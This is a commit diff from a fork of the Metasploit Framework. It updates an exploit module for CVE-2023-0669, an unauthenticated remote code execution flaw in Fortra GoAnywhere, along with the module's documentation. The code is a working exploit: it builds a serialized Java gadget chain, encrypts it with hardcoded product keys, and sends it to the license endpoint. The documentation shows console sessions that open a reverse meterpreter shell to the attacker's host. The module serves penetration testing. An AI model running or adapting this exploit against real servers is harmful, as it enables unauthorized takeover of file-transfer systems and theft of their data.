dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #3 from smcintyre-r7/pr/collab/17607 

Pr/collab/17607
This commit is contained in:
Ron Bowes 2023-02-08 09:41:35 -08:00 committed by GitHub
parent 676bb2af02 2b008af097
commit 0c6ebed3ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 50 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
documentation/modules/exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669.md → modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.md
View File

@ -10,7 +10,7 @@ register - you can just create a free account and download the application.
1. Install the application
1. Start the application on the server with `./goanywhere.sh start`
1. Start msfconsole
1. Do: `use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669`
1. Do: `use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669`
1. Set `LHOST` / `RHOST`
1. Do: `run`
1. You should get a shell.
@ -19,20 +19,19 @@ register - you can just create a free account and download the application.
### TARGET_URI
Set to the base path for the exploit - the default
(`/goanywhere/lic/accept?bundle=`) is usually fine.
Set to the base path for the exploit - the default (`/goanywhere/lic/accept`) is usually fine.
### VERSION
### Version
The version number of the encryption, which is appended to the encrypted text.
Changing the target will change this, but normally you don't have to tweak this.
Some hosts (like in FIPS-compliant mode) don't allow version 1, but preumably
Some hosts (like in FIPS-compliant mode) don't allow version 1, but presumably
there are older hosts that don't support version 2.
### ENCRYPTION_KEY / ENCRYPTION_IV / ENCRYPTION_ALGORITHM
### EncryptionKey / EncryptionIv / EncryptionAlgorithm
How to encrypt the object. Depending on the `VERSION`, there are different
How to encrypt the object. Depending on the `Version`, there are different
keys. This is updated when you change TARGET and probably doesn't need to be
changed.
@ -41,7 +40,7 @@ changed.
### Version 7.1.1 on Fedora Linux
```
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
@ -63,7 +62,7 @@ Server username: ron
### Using an earlier encryption version
```
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
@ -102,7 +101,7 @@ meterpreter >
# Version 7.1.1 over HTTP
```
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179

64
modules/exploits/linux/http/fortra_goanywhere_rce_cve_2023_0669.rb → modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.rb
View File

@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::JavaDeserialization
def initialize(info = {})
@ -29,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DisclosureDate' => '2023-02-01',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Platform' => ['unix', 'win'],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
@ -37,10 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Version 2 Encryption',
{
'DefaultOptions' => {
'VERSION' => '$2',
'ENCRYPTION_KEY' => 'Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=',
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
'Version' => '$2',
'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca',
'EncryptionIv' => '4145532f4342432f504b435335506164'
}
},
],
@ -48,10 +46,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Version 1 Encryption',
{
'DefaultOptions' => {
'VERSION' => nil,
'ENCRYPTION_KEY' => 'Z4tYML+Lii4EdLl9bNGOhF+8SxH8oNavLbHrEUwp/Es=',
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
'Version' => '',
'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b',
'EncryptionIv' => '4145532f4342432f504b435335506164'
}
}
],
@ -59,8 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8001,
'SSL' => true,
'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
@ -75,30 +71,52 @@ class MetasploitModule < Msf::Exploit::Remote
])
register_advanced_options([
OptString.new('VERSION', [false, 'A version value to append to the encrypted data', '$2']),
OptString.new('ENCRYPTION_KEY', [true, 'The encryption key to use (base64-encoded)']),
OptString.new('ENCRYPTION_IV', [true, 'The initialization vector (base64-encoded)']),
OptString.new('ENCRYPTION_ALGORITHM', [true, 'The encryption algorithm'])
OptString.new('Version', [false, 'A version value to append to the encrypted data']),
OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC'])
])
end
def build_cipher
unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(datastore['EncryptionAlgorithm']) }
raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' })
end
cipher = OpenSSL::Cipher.new(datastore['EncryptionAlgorithm'])
cipher.encrypt
option_errors = {}
iv = datastore['EncryptionIv'].scan(/../).map { |x| x.hex.chr }.join
unless cipher.iv_len == iv.length
option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})."
end
key = datastore['EncryptionKey'].scan(/../).map { |x| x.hex.chr }.join
unless cipher.key_len == key.length
option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})."
end
raise Msf::OptionValidateError, option_errors unless option_errors.empty?
cipher.iv = iv
cipher.key = key
cipher
end
def exploit
vprint_status('Generating a serialized Java object with the payload')
obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload)
vprint_status('Encrypting the payload')
cipher = OpenSSL::Cipher.new(datastore['ENCRYPTION_ALGORITHM'])
cipher.encrypt
cipher.iv = Base64.decode64(datastore['ENCRYPTION_IV'])
cipher.key = Base64.decode64(datastore['ENCRYPTION_KEY'])
cipher = build_cipher
obj = cipher.update(obj) + cipher.final
vprint_status('Sending request to the server')
res = send_request_cgi(
'method' => 'GET',
'method' => 'POST',
'uri' => datastore['TARGETURI'],
'vars_get' => {
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['VERSION'] || ''}"
'vars_post' => {
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}"
}
)